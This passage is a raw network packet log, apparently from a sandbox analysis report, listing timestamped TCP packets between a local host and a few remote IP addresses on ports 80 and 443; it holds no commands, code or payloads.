Dec 18, 2024 13:38:47.632019043 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.632105112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.632200956 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.632303953 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.633179903 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.633318901 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.633466959 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.633590937 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.634371996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.634449005 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.634608030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.634999037 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.635505915 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.635695934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.635725975 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.635987043 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.636836052 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.636898041 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.637027025 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.637119055 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.637891054 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.637948036 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.638113022 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.639170885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.639247894 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.639323950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.640223026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.640335083 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.640369892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.640512943 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.641407967 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.641617060 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.641700983 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.642591953 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.642667055 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.642734051 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.642844915 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.643781900 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.643841982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.644023895 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.644253016 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.644995928 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.645122051 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.645172119 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.645241022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.646038055 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.646087885 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.646269083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.647253990 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.647336960 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.647449017 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.648406029 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.648478985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.648657084 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.648715973 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.649703026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.649827003 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.649890900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.650800943 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.650983095 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.651001930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.651046038 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.652065992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.652084112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.652170897 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.652170897 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.653137922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.653228998 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.653244972 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.653278112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.654249907 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.654448032 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.654527903 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.654527903 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.655541897 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.655769110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.655915976 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.656771898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.656939030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.657120943 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.658376932 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.658392906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.658477068 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.659137964 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.659249067 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.659267902 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.659333944 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.660093069 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.660238981 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.660278082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.660362005 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.661298037 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.661458015 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.661477089 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.661564112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.662456036 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.662511110 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.662636042 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.662688017 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.663667917 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.663811922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.663887978 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.664803982 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.664961100 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.665265083 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.665994883 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.666141033 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.666292906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.667359114 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.667422056 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.667579889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.667721033 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.668546915 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.668839931 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.668864012 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.668935061 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.669873953 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.670006037 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.670023918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.670140982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.670991898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.671049118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.671169996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.672143936 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.672218084 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.672398090 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.673158884 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.673283100 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.721623898 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.721714973 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.765171051 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:47.765345097 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:47.804063082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.804151058 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.804256916 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.804363966 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.804673910 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.804735899 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.804872990 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.804939032 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.805727959 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.805783987 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.806035042 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.806118965 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.806997061 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.807055950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.807193041 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.807260990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.808007002 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.808063030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.808357954 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.808409929 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.809211016 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.809273005 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.809369087 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.809422970 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.810405016 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.810465097 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.810569048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.810640097 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.811831951 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.811920881 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.812289953 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.812339067 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.813179016 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.813225985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.813371897 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.813442945 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.814961910 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.815016985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.815342903 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.815435886 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.816133022 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.816193104 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.816267967 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.816349983 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.817189932 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.817257881 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.817291975 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.817342997 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.818393946 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.818445921 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.818459034 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.818515062 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.819581032 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.819643974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.819729090 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.819782019 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.820763111 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.820822001 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.820873022 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.820923090 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.821657896 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.821856976 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.821877003 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.821959972 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.822606087 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.822855949 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.822902918 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.822902918 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.823425055 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.823477030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.823553085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.823645115 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.824569941 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.824585915 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.824632883 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.824728966 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.825576067 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.825670004 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.825795889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.825886965 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.826807976 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.827027082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.827073097 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.827073097 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.828027010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.828223944 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.828294039 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.828294039 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.829395056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.829448938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.829541922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.830395937 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.830476046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.830708027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.830727100 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.831087112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.831562996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.831634998 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.831677914 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.831677914 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.832679033 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.832768917 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.832799911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.832954884 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.833759069 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.833842039 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.833929062 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.834017038 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.835031986 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.835092068 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.835151911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.835345030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.836107969 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.836236954 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.836280107 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.836344957 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.837294102 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.837414026 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.837443113 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.837524891 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.838505030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.838633060 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.838709116 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.838871956 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.839641094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.839700937 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.839811087 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.839901924 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.840780020 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.840853930 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.840997934 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.841074944 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.842001915 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.842094898 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.842238903 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.842385054 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.843138933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.843200922 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.843282938 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.843344927 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.844327927 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.844381094 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.844471931 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.844594002 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.845474958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.845529079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.845638037 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.845717907 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.846880913 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.846963882 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.847021103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.847083092 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.847986937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.848050117 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.848098993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.848181009 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.849030972 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.849117994 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.849150896 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.849206924 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.850224018 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.850286007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.850316048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.850560904 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.851437092 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.851505995 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.851520061 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.851632118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.852485895 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.852551937 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.852684975 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.852749109 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.853626013 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.853765011 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.853809118 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.854001045 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.854856014 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.854907990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.854986906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.855038881 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.855642080 CET	443	49722	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:47.855761051 CET	443	49722	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:47.855889082 CET	49722	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:47.855923891 CET	49722	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:47.855967999 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.856146097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.856168985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.856251001 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.857167006 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.857284069 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.857323885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.857486963 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.858470917 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.858546019 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.858620882 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.858730078 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.859622955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.859849930 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.859880924 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.859944105 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.860661030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.860883951 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.860889912 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.861012936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.861852884 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.861931086 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:47.862086058 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:47.862181902 CET	49723	80	192.168.2.8	31.41.244.11
